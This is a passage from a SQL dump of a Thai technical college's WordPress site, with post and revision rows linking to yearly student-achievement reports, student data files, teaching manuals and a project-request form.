นักศึกษา ปีการศึกษา 2555</a></h3>\r\n<h3><a href=\"/wp-content/uploads/2018/05/รายงานผลสัมฤทธิ์ทางการเรียนของนักเรียน-นักศึกษา-ปีการศึกษา-2554.pdf\">รายงานผลสัมฤทธิ์ทางการเรียนของนักเรียน นักศึกษา ปีการศึกษา 2554</a></h3>\r\n<h3><a href=\"/wp-content/uploads/2018/05/รายงานผลสัมฤทธิ์ทางการเรียนของนักเรียน-นักศึกษา-ปีการศึกษา-2553.pdf\">รายงานผลสัมฤทธิ์ทางการเรียนของนักเรียน นักศึกษา ปีการศึกษา 2553</a></h3>\r\n<h3><a href=\"/wp-content/uploads/2018/05/รายงานผลสัมฤทธิ์ทางการเรียนของนักเรียน-นักศึกษา-ปีการศึกษา-2552.pdf\">รายงานผลสัมฤทธิ์ทางการเรียนของนักเรียน นักศึกษา ปีการศึกษา 2552</a></h3>\r\n<h3><a href=\"/wp-content/uploads/2018/05/รายงานผลสัมฤทธิ์ทางการเรียนของนักเรียน-นักศึกษา-ปีการศึกษา-2551.pdf\">รายงานผลสัมฤทธิ์ทางการเรียนของนักเรียน นักศึกษา ปีการศึกษา 2551</a></h3>\r\n<h3></h3>', 'รายงานผลสัมฤทธิ์ทางการเรียนของนักเรียน นักศึกษา', '', 'inherit', 'closed', 'closed', '', '2418-revision-v1', '', '', '2018-05-09 16:05:41', '2018-05-09 09:05:41', '', 2418, 'http://www.technicrayong.ac.th/2418-revision-v1/', 0, 'revision', '', 0),
(2430, 3, '2018-05-09 16:06:45', '2018-05-09 09:06:45', '<h3><span style=\"color: #ff00ff;\">รายงานผลสัมฤทธิ์ทางการเรียนของนักเรียน นักศึกษา ปีการศึกษา 2561</span></h3>\r\n<h3><span style=\"color: #ff00ff;\">รายงานผลสัมฤทธิ์ทางการเรียนของนักเรียน นักศึกษา ปีการศึกษา 2560</span></h3>\r\n<h3><span style=\"color: #ff00ff;\">รายงานผลสัมฤทธิ์ทางการเรียนของนักเรียน นักศึกษา ปีการศึกษา 2559</span></h3>\r\n<h3><span style=\"color: #ff00ff;\"><a style=\"color: #ff00ff;\" href=\"/wp-content/uploads/2018/05/รายงานผลสัมฤทธิ์ทางการเรียนของนักเรียน-นักศึกษา-ปีการศึกษา-2558.pdf\">รายงานผลสัมฤทธิ์ทางการเรียนของนักเรียน นักศึกษา ปีการศึกษา 2558</a></span></h3>\r\n<h3><span style=\"color: #ff00ff;\">รายงานผลสัมฤทธิ์ทางการเรียนของนักเรียน นักศึกษา ปีการศึกษา 2557</span></h3>\r\n<h3><span style=\"color: #ff00ff;\"><a style=\"color: #ff00ff;\" href=\"/wp-content/uploads/2018/05/รายงานผลสัมฤทธิ์ทางการเรียนของนักเรียน-นักศึกษา-ปีการศึกษา-2556.pdf\">รายงานผลสัมฤทธิ์ทางการเรียนของนักเรียน นักศึกษา ปีการศึกษา 2556</a></span></h3>\r\n<h3><span style=\"color: #ff00ff;\"><a style=\"color: #ff00ff;\" href=\"/wp-content/uploads/2018/05/รายงานผลสัมฤทธิ์ทางการเรียนของนักเรียน-นักศึกษา-ปีการศึกษา-2555.pdf\">รายงานผลสัมฤทธิ์ทางการเรียนของนักเรียน นักศึกษา ปีการศึกษา 2555</a></span></h3>\r\n<h3><span style=\"color: #ff00ff;\"><a style=\"color: #ff00ff;\" href=\"/wp-content/uploads/2018/05/รายงานผลสัมฤทธิ์ทางการเรียนของนักเรียน-นักศึกษา-ปีการศึกษา-2554.pdf\">รายงานผลสัมฤทธิ์ทางการเรียนของนักเรียน นักศึกษา ปีการศึกษา 2554</a></span></h3>\r\n<h3><span style=\"color: #ff00ff;\"><a style=\"color: #ff00ff;\" href=\"/wp-content/uploads/2018/05/รายงานผลสัมฤทธิ์ทางการเรียนของนักเรียน-นักศึกษา-ปีการศึกษา-2553.pdf\">รายงานผลสัมฤทธิ์ทางการเรียนของนักเรียน นักศึกษา ปีการศึกษา 2553</a></span></h3>\r\n<h3><span style=\"color: #ff00ff;\"><a style=\"color: #ff00ff;\" href=\"/wp-content/uploads/2018/05/รายงานผลสัมฤทธิ์ทางการเรียนของนักเรียน-นักศึกษา-ปีการศึกษา-2552.pdf\">รายงานผลสัมฤทธิ์ทางการเรียนของนักเรียน นักศึกษา ปีการศึกษา 2552</a></span></h3>\r\n<h3><span style=\"color: #ff00ff;\"><a style=\"color: #ff00ff;\" href=\"/wp-content/uploads/2018/05/รายงานผลสัมฤทธิ์ทางการเรียนของนักเรียน-นักศึกษา-ปีการศึกษา-2551.pdf\">รายงานผลสัมฤทธิ์ทางการเรียนของนักเรียน นักศึกษา ปีการศึกษา 2551</a></span></h3>\r\n<h3></h3>', 'รายงานผลสัมฤทธิ์ทางการเรียนของนักเรียน นักศึกษา', '', 'inherit', 'closed', 'closed', '', '2418-revision-v1', '', '', '2018-05-09 16:06:45', '2018-05-09 09:06:45', '', 2418, 'http://www.technicrayong.ac.th/2418-revision-v1/', 0, 'revision', '', 0);
INSERT INTO `wp_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(2434, 3, '2018-05-09 16:10:14', '2018-05-09 09:10:14', '<h3><span style=\"color: #ff00ff;\">รายงานผลสัมฤทธิ์ทางการเรียนของนักเรียน นักศึกษา ปีการศึกษา 2561</span></h3>\r\n<h3><span style=\"color: #ff00ff;\">รายงานผลสัมฤทธิ์ทางการเรียนของนักเรียน นักศึกษา ปีการศึกษา 2560</span></h3>\r\n<h3><span style=\"color: #ff00ff;\">รายงานผลสัมฤทธิ์ทางการเรียนของนักเรียน นักศึกษา ปีการศึกษา 2559</span></h3>\r\n<h3><span style=\"color: #ff00ff;\"><a style=\"color: #ff00ff;\" href=\"/wp-content/uploads/2018/05/รายงานผลสัมฤทธิ์ทางการเรียนของนักเรียน-นักศึกษา-ปีการศึกษา-2558.pdf\">รายงานผลสัมฤทธิ์ทางการเรียนของนักเรียน นักศึกษา ปีการศึกษา 2558</a></span></h3>\r\n<h3><span style=\"color: #ff00ff;\"><a style=\"color: #ff00ff;\" href=\"/wp-content/uploads/2018/05/รายงานผลสัมฤทธิ์ทางการเรียนของนักเรียน-นักศึกษา-ปีการศึกษา-2557.pdf\">รายงานผลสัมฤทธิ์ทางการเรียนของนักเรียน นักศึกษา ปีการศึกษา 2557</a></span></h3>\r\n<h3><span style=\"color: #ff00ff;\"><a style=\"color: #ff00ff;\" href=\"/wp-content/uploads/2018/05/รายงานผลสัมฤทธิ์ทางการเรียนของนักเรียน-นักศึกษา-ปีการศึกษา-2556.pdf\">รายงานผลสัมฤทธิ์ทางการเรียนของนักเรียน นักศึกษา ปีการศึกษา 2556</a></span></h3>\r\n<h3><span style=\"color: #ff00ff;\"><a style=\"color: #ff00ff;\" href=\"/wp-content/uploads/2018/05/รายงานผลสัมฤทธิ์ทางการเรียนของนักเรียน-นักศึกษา-ปีการศึกษา-2555.pdf\">รายงานผลสัมฤทธิ์ทางการเรียนของนักเรียน นักศึกษา ปีการศึกษา 2555</a></span></h3>\r\n<h3><span style=\"color: #ff00ff;\"><a style=\"color: #ff00ff;\" href=\"/wp-content/uploads/2018/05/รายงานผลสัมฤทธิ์ทางการเรียนของนักเรียน-นักศึกษา-ปีการศึกษา-2554.pdf\">รายงานผลสัมฤทธิ์ทางการเรียนของนักเรียน นักศึกษา ปีการศึกษา 2554</a></span></h3>\r\n<h3><span style=\"color: #ff00ff;\"><a style=\"color: #ff00ff;\" href=\"/wp-content/uploads/2018/05/รายงานผลสัมฤทธิ์ทางการเรียนของนักเรียน-นักศึกษา-ปีการศึกษา-2553.pdf\">รายงานผลสัมฤทธิ์ทางการเรียนของนักเรียน นักศึกษา ปีการศึกษา 2553</a></span></h3>\r\n<h3><span style=\"color: #ff00ff;\"><a style=\"color: #ff00ff;\" href=\"/wp-content/uploads/2018/05/รายงานผลสัมฤทธิ์ทางการเรียนของนักเรียน-นักศึกษา-ปีการศึกษา-2552.pdf\">รายงานผลสัมฤทธิ์ทางการเรียนของนักเรียน นักศึกษา ปีการศึกษา 2552</a></span></h3>\r\n<h3><span style=\"color: #ff00ff;\"><a style=\"color: #ff00ff;\" href=\"/wp-content/uploads/2018/05/รายงานผลสัมฤทธิ์ทางการเรียนของนักเรียน-นักศึกษา-ปีการศึกษา-2551.pdf\">รายงานผลสัมฤทธิ์ทางการเรียนของนักเรียน นักศึกษา ปีการศึกษา 2551</a></span></h3>\r\n<h3></h3>', 'รายงานผลสัมฤทธิ์ทางการเรียนของนักเรียน นักศึกษา', '', 'inherit', 'closed', 'closed', '', '2418-revision-v1', '', '', '2018-05-09 16:10:14', '2018-05-09 09:10:14', '', 2418, 'http://www.technicrayong.ac.th/2418-revision-v1/', 0, 'revision', '', 0),
(2440, 4, '2018-05-10 04:30:15', '2018-05-09 21:30:15', '<p style=\"padding-left: 30px;\"><span style=\"color: #800080;\"><a style=\"color: #800080;\" href=\"https://drive.google.com/open?id=1zgMqsJ1EQAf994V8G0dQLF8OidBBP5Rs\">คู่มือ ID Plan</a></span></p>\r\n<p style=\"padding-left: 30px;\"><span style=\"color: #800080;\">คู่มือ PLC</span></p>\r\n<p style=\"padding-left: 30px;\"><span style=\"color: #800080;\"><a style=\"color: #800080;\" href=\"https://drive.google.com/open?id=1DUO94GAj503xoHcT_zh42s7UEZ76_Yu9\">เอกสารประกอบการบรรยายการประเมินตนเองและ ID Plan</a></span></p>\r\n<p style=\"padding-left: 30px;\"><span style=\"color: #800080;\"><a style=\"color: #800080;\" href=\"https://drive.google.com/open?id=1iEy9kHBnv7TkIEOFnr1X8FmtQ_J3Z52C\">เอกสารประกอบการบรรยาย PLC</a></span></p>\r\n<p style=\"padding-left: 30px;\"><span style=\"color: #800080;\"><a style=\"color: #800080;\" href=\"https://drive.google.com/open?id=13W0BfhXa2lokedlGTwLCq3-Tp4Ta4np0\">เอกสารประกอบการบรรยาย ว.21</a></span></p>\r\n<p style=\"padding-left: 30px;\"><span style=\"color: #800080;\"><a style=\"color: #800080;\" href=\"https://drive.google.com/open?id=1S8NUwHl1LTsPKIwiTVwvdpEqurK9ojV6\">ถาม-ตอบ เกี่ยวกับ ว.21</a></span></p>\r\n<p style=\"padding-left: 30px;\"><span style=\"color: #800080;\"><a style=\"color: #800080;\" href=\"http://bsq2.vec.go.th/document/%E0%B8%84%E0%B8%B9%E0%B9%88%E0%B8%A1%E0%B8%B7%E0%B8%AD%E0%B8%88%E0%B8%B1%E0%B8%94%E0%B8%97%E0%B8%B3%E0%B9%81%E0%B8%9C%E0%B8%99%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B8%88%E0%B8%B1%E0%B8%94%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B9%80%E0%B8%A3%E0%B8%B5%E0%B8%A2%E0%B8%99%E0%B8%A3%E0%B8%B9%E0%B9%89%E0%B8%A1%E0%B8%B8%E0%B9%88%E0%B8%87%E0%B9%80%E0%B8%99%E0%B9%89%E0%B8%99%E0%B8%AA%E0%B8%A1%E0%B8%A3%E0%B8%A3%E0%B8%96%E0%B8%99%E0%B8%B0%20(%E0%B9%80%E0%B8%A5%E0%B9%88%E0%B8%A1%E0%B8%97%E0%B8%B5%E0%B9%88%201)/%E0%B9%80%E0%B8%A5%E0%B9%88%E0%B8%A1%E0%B8%97%E0%B8%B5%E0%B9%881.rar\">คู่มือการจัดทำแผนการเรียนรู้มุ่งเน้นสมรรถนะ </a></span></p>\r\n<p style=\"padding-left: 30px;\"><span style=\"color: #800080;\"><a style=\"color: #800080;\" href=\"http://bsq2.vec.go.th/document/%E0%B8%84%E0%B8%B9%E0%B9%88%E0%B8%A1%E0%B8%B7%E0%B8%AD%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B9%80%E0%B8%82%E0%B8%B5%E0%B8%A2%E0%B8%99%E0%B8%A3%E0%B8%B2%E0%B8%A2%E0%B8%87%E0%B8%B2%E0%B8%99%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B8%A7%E0%B8%B4%E0%B8%88%E0%B8%B1%E0%B8%A2%E0%B9%80%E0%B8%9E%E0%B8%B7%E0%B9%88%E0%B8%AD%E0%B8%9E%E0%B8%B1%E0%B8%92%E0%B8%99%E0%B8%B2%E0%B8%84%E0%B8%B8%E0%B8%A3%E0%B8%A0%E0%B8%B2%E0%B8%9E%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B8%88%E0%B8%B1%E0%B8%94%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B9%80%E0%B8%A3%E0%B8%B5%E0%B8%A2%E0%B8%99%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B8%AA%E0%B8%AD%E0%B8%99%E0%B8%AD%E0%B8%B2%E0%B8%8A%E0%B8%B5%E0%B8%A7%E0%B8%A8%E0%B8%B6%E0%B8%81%E0%B8%A9%E0%B8%B2/%E0%B9%80%E0%B8%A5%E0%B9%88%E0%B8%A1%E0%B8%97%E0%B8%B5%E0%B9%882.rar\">คู่มือการเขียนรายงานการวิจัย</a></span></p>\r\n<p style=\"padding-left: 30px;\"><a href=\"https://drive.google.com/open?id=1h4nIcmATgPGm4SsrvyheCzZT457lOiRc\">ว.21</a></p>\r\n<p style=\"padding-left: 30px;\"><a href=\"https://drive.google.com/open?id=1sGN5LP53gIappo8Oc-j7Y7zpus4UUxpj\">ว.22</a></p>', 'เอกสารพัฒนาการเรียนการสอน', '', 'inherit', 'closed', 'closed', '', '2169-revision-v1', '', '', '2018-05-10 04:30:15', '2018-05-09 21:30:15', '', 2169, 'http://www.technicrayong.ac.th/2169-revision-v1/', 0, 'revision', '', 0),
(2442, 3, '2018-05-10 12:49:47', '2018-05-10 05:49:47', '', 'บันทึกข้อความขอดำเนินโครงการเปล่า', '', 'inherit', 'closed', 'closed', '', '%e0%b8%9a%e0%b8%b1%e0%b8%99%e0%b8%97%e0%b8%b6%e0%b8%81%e0%b8%82%e0%b9%89%e0%b8%ad%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%82%e0%b8%ad%e0%b8%94%e0%b8%b3%e0%b9%80%e0%b8%99%e0%b8%b4%e0%b8%99%e0%b9%82', '', '', '2018-05-10 12:49:47', '2018-05-10 05:49:47', '', 1784, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/05/บันทึกข้อความขอดำเนินโครงการเปล่า.pdf', 0, 'attachment', 'application/pdf', 0),
(2443, 3, '2018-05-10 12:49:51', '2018-05-10 05:49:51', '', 'บันทึกข้อความขอดำเนินโครงการเปล่า', '', 'inherit', 'closed', 'closed', '', '%e0%b8%9a%e0%b8%b1%e0%b8%99%e0%b8%97%e0%b8%b6%e0%b8%81%e0%b8%82%e0%b9%89%e0%b8%ad%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%82%e0%b8%ad%e0%b8%94%e0%b8%b3%e0%b9%80%e0%b8%99%e0%b8%b4%e0%b8%99%e0%b9%82-2', '', '', '2018-05-10 12:49:51', '2018-05-10 05:49:51', '', 1784, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/05/บันทึกข้อความขอดำเนินโครงการเปล่า.docx', 0, 'attachment', 'application/vnd.openxmlformats-officedocument.wordprocessingml.document', 0),
(2444, 3, '2018-05-10 13:30:31', '2018-05-10 06:30:31', '<img class=\"aligncenter size-full wp-image-1766\" src=\"/wp-content/uploads/2018/03/13-3-2561-12-01-14.jpg\" alt=\"\" width=\"190\" height=\"239\" />\r\n\r\n<img class=\"aligncenter wp-image-1767\" src=\"/wp-content/uploads/2018/03/13-3-2561-11-07-18-300x84.jpg\" alt=\"\" width=\"376\" height=\"105\" />\r\n\r\n<img class=\"aligncenter wp-image-1768 size-full\" src=\"/wp-content/uploads/2018/03/13-3-2561-11-06-24.jpg\" alt=\"\" width=\"489\" height=\"317\" />\r\n<h3><span style=\"color: #0000ff;\">แบบฟอร์ม บันทึกข้อความขอดำเนินโครงการ >> <span style=\"color: #ff0000;\"><a style=\"color: #ff0000;\" href=\"/wp-content/uploads/2018/05/บันทึกข้อความขอดำเนินโครงการเปล่า.pdf\">ไฟล์ PDF</a></span><< >><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/บันทึกข้อความขอดำเนินโครงการเปล่า.docx\"><span style=\"color: #ff0000;\">ไฟล์ Word</span><<</a></span></h3>', 'งานกิจกรรมนักเรียน นักศึกษา', '', 'inherit', 'closed', 'closed', '', '1784-revision-v1', '', '', '2018-05-10 13:30:31', '2018-05-10 06:30:31', '', 1784, 'http://www.technicrayong.ac.th/1784-revision-v1/', 0, 'revision', '', 0),
(2445, 3, '2018-05-10 13:33:25', '2018-05-10 06:33:25', '', 'องค์การนักวิชาชีพในอนาคตแห่งประเทศไทย', '', 'publish', 'closed', 'closed', '', '%e0%b8%ad%e0%b8%87%e0%b8%84%e0%b9%8c%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b8%a7%e0%b8%b4%e0%b8%8a%e0%b8%b2%e0%b8%8a%e0%b8%b5%e0%b8%9e%e0%b9%83%e0%b8%99%e0%b8%ad%e0%b8%99%e0%b8%b2', '', '', '2022-04-29 12:30:33', '2022-04-29 05:30:33', '', 0, 'http://www.technicrayong.ac.th/?p=2445', 46, 'nav_menu_item', '', 0),
(2446, 3, '2018-05-10 13:58:02', '2018-05-10 06:58:02', '<h3><a href=\"/ข้อมูลนักเรียน-นักศึกษ-3\"><span style=\"color: #0000ff;\">ข้อมูลนักเรียน นักศึกษา ปีการศึกษา 2561 <span style=\"color: #ff0000;\">NEW !!</span></span></a></h3>\r\n<h3><span style=\"color: #0000ff;\"><strong><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/ข้อมูลนักเรียน-นักศึกษา-2560.pdf\">ข้อมูลนักเรียน นักศึกษา ปีการศึกษา 2560</a></strong></span></h3>\r\n<h3><span style=\"color: #0000ff;\"><strong><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/ข้อมูลนักเรียน-นักศึกษา-2559.pdf\">ข้อมูลนักเรียน นักศึกษา </a><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/ข้อมูลนักเรียน-นักศึกษา-2560.pdf\">ปีการศึกษา</a><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/ข้อมูลนักเรียน-นักศึกษา-2559.pdf\"> 2559</a></strong></span></h3>\r\n<h3><span style=\"color: #0000ff;\"><strong><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/ข้อมูลนักเรียน-นักศึกษา-2558.pdf\">ข้อมูลนักเรียน นักศึกษา </a><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/ข้อมูลนักเรียน-นักศึกษา-2560.pdf\">ปีการศึกษา</a><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/ข้อมูลนักเรียน-นักศึกษา-2558.pdf\"> 2558</a></strong></span></h3>\r\n<h3><span style=\"color: #0000ff;\"><strong><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/ข้อมูลนักเรียน-นักศึกษา-2557.pdf\">ข้อมูลนักเรียน นักศึกษา </a><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/ข้อมูลนักเรียน-นักศึกษา-2560.pdf\">ปีการศึกษา</a><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/ข้อมูลนักเรียน-นักศึกษา-2557.pdf\"> 2557</a></strong></span></h3>\r\n<h3><span style=\"color: #0000ff;\"><strong><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/ข้อมูลนักเรียน-นักศึกษา-2556.pdf\">ข้อมูลนักเรียน นักศึกษา </a><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/ข้อมูลนักเรียน-นักศึกษา-2560.pdf\">ปีการศึกษา</a><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/ข้อมูลนักเรียน-นักศึกษา-2556.pdf\"> 2556</a></strong></span></h3>\r\n<h3><span style=\"color: #0000ff;\"><strong><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/ข้อมูลนักเรียน-นักศึกษา-2555.pdf\">ข้อมูลนักเรียน นักศึกษา </a><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/ข้อมูลนักเรียน-นักศึกษา-2560.pdf\">ปีการศึกษา</a><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/ข้อมูลนักเรียน-นักศึกษา-2555.pdf\"> 2555</a></strong></span></h3>\r\n<h3><span style=\"color: #0000ff;\"><strong><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/ข้อมูลนักเรียน-นักศึกษา-2554.pdf\">ข้อมูลนักเรียน นักศึกษา </a><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/ข้อมูลนักเรียน-นักศึกษา-2560.pdf\">ปีการศึกษา</a><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/ข้อมูลนักเรียน-นักศึกษา-2554.pdf\"> 2554</a></strong></span></h3>\r\n<h3><span style=\"color: #0000ff;\"><strong><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/ข้อมูลนักเรียน-นักศึกษา-2553.pdf\">ข้อมูลนักเรียน นักศึกษา </a><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/ข้อมูลนักเรียน-นักศึกษา-2560.pdf\">ปีการศึกษา</a><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/ข้อมูลนักเรียน-นักศึกษา-2553.pdf\"> 2553</a></strong></span></h3>\r\n<h3><span style=\"color: #0000ff;\"><strong><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/ข้อมูลนักเรียน-นักศึกษา-2552.pdf\">ข้อมูลนักเรียน นักศึกษา </a><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/ข้อมูลนักเรียน-นักศึกษา-2560.pdf\">ปีการศึกษา</a><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/ข้อมูลนักเรียน-นักศึกษา-2552.pdf\"> 2552</a></strong></span></h3>\r\n<h3><span style=\"color: #0000ff;\"><strong><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/ข้อมูลนักเรียน-นักศึกษา-2551.pdf\">ข้อมูลนักเรียน นักศึกษา </a><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/ข้อมูลนักเรียน-นักศึกษา-2560.pdf\">ปีการศึกษา</a><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/ข้อมูลนักเรียน-นักศึกษา-2551.pdf\"> 2551</a></strong></span></h3>\r\n<h3><span style=\"color: #0000ff;\"><strong><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/ข้อมูลนักเรียน-นักศึกษา-2550.pdf\">ข้อมูลนักเรียน นักศึกษา </a><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/ข้อมูลนักเรียน-นักศึกษา-2560.pdf\">ปีการศึกษา</a><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/ข้อมูลนักเรียน-นักศึกษา-2550.pdf\"> 2550</a></strong></span></h3>\r\n<h3><span style=\"color: #0000ff;\"><strong><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/ข้อมูลนักเรียน-นักศึกษา-2549.pdf\">ข้อมูลนักเรียน นักศึกษา </a><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/ข้อมูลนักเรียน-นักศึกษา-2560.pdf\">ปีการศึกษา</a><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/ข้อมูลนักเรียน-นักศึกษา-2549.pdf\"> 2549</a></strong></span></h3>', 'ข้อมูลนักเรียน นักศึกษา', '', 'publish', 'closed', 'closed', '', '%e0%b8%82%e0%b9%89%e0%b8%ad%e0%b8%a1%e0%b8%b9%e0%b8%a5%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b8%a8%e0%b8%b6%e0%b8%81%e0%b8%a9-2', '', '', '2018-06-27 15:51:54', '2018-06-27 08:51:54', '', 0, 'http://www.technicrayong.ac.th/?page_id=2446', 0, 'page', '', 0),
(2447, 3, '2018-05-10 13:53:52', '2018-05-10 06:53:52', '', 'ข้อมูลนักเรียน นักศึกษา 2549', '', 'inherit', 'closed', 'closed', '', '%e0%b8%82%e0%b9%89%e0%b8%ad%e0%b8%a1%e0%b8%b9%e0%b8%a5%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b8%a8%e0%b8%b6%e0%b8%81%e0%b8%a9-2', '', '', '2018-05-10 13:53:52', '2018-05-10 06:53:52', '', 2446, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/05/ข้อมูลนักเรียน-นักศึกษา-2549.pdf', 0, 'attachment', 'application/pdf', 0),
(2448, 3, '2018-05-10 13:53:54', '2018-05-10 06:53:54', '', 'ข้อมูลนักเรียน นักศึกษา 2550', '', 'inherit', 'closed', 'closed', '', '%e0%b8%82%e0%b9%89%e0%b8%ad%e0%b8%a1%e0%b8%b9%e0%b8%a5%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b8%a8%e0%b8%b6%e0%b8%81%e0%b8%a9-3', '', '', '2018-05-10 13:53:54', '2018-05-10 06:53:54', '', 2446, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/05/ข้อมูลนักเรียน-นักศึกษา-2550.pdf', 0, 'attachment', 'application/pdf', 0),
(2449, 3, '2018-05-10 13:53:55', '2018-05-10 06:53:55', '', 'ข้อมูลนักเรียน นักศึกษา 2551', '', 'inherit', 'closed', 'closed', '', '%e0%b8%82%e0%b9%89%e0%b8%ad%e0%b8%a1%e0%b8%b9%e0%b8%a5%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b8%a8%e0%b8%b6%e0%b8%81%e0%b8%a9-4', '', '', '2018-05-10 13:53:55', '2018-05-10 06:53:55', '', 2446, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/05/ข้อมูลนักเรียน-นักศึกษา-2551.pdf', 0, 'attachment', 'application/pdf', 0),
(2450, 3, '2018-05-10 13:53:57', '2018-05-10 06:53:57', '', 'ข้อมูลนักเรียน นักศึกษา 2552', '', 'inherit', 'closed', 'closed', '', '%e0%b8%82%e0%b9%89%e0%b8%ad%e0%b8%a1%e0%b8%b9%e0%b8%a5%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b8%a8%e0%b8%b6%e0%b8%81%e0%b8%a9-5', '', '', '2018-05-10 13:53:57', '2018-05-10 06:53:57', '', 2446, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/05/ข้อมูลนักเรียน-นักศึกษา-2552.pdf', 0, 'attachment', 'application/pdf', 0),
(2451, 3, '2018-05-10 13:53:59', '2018-05-10 06:53:59', '', 'ข้อมูลนักเรียน นักศึกษา 2553', '', 'inherit', 'closed', 'closed', '', '%e0%b8%82%e0%b9%89%e0%b8%ad%e0%b8%a1%e0%b8%b9%e0%b8%a5%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b8%a8%e0%b8%b6%e0%b8%81%e0%b8%a9-6', '', '', '2018-05-10 13:53:59', '2018-05-10 06:53:59', '', 2446, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/05/ข้อมูลนักเรียน-นักศึกษา-2553.pdf', 0, 'attachment', 'application/pdf', 0),
(2452, 3, '2018-05-10 13:54:01', '2018-05-10 06:54:01', '', 'ข้อมูลนักเรียน นักศึกษา 2554', '', 'inherit', 'closed', 'closed', '', '%e0%b8%82%e0%b9%89%e0%b8%ad%e0%b8%a1%e0%b8%b9%e0%b8%a5%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b8%a8%e0%b8%b6%e0%b8%81%e0%b8%a9-7', '', '', '2018-05-10 13:54:01', '2018-05-10 06:54:01', '', 2446, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/05/ข้อมูลนักเรียน-นักศึกษา-2554.pdf', 0, 'attachment', 'application/pdf', 0),
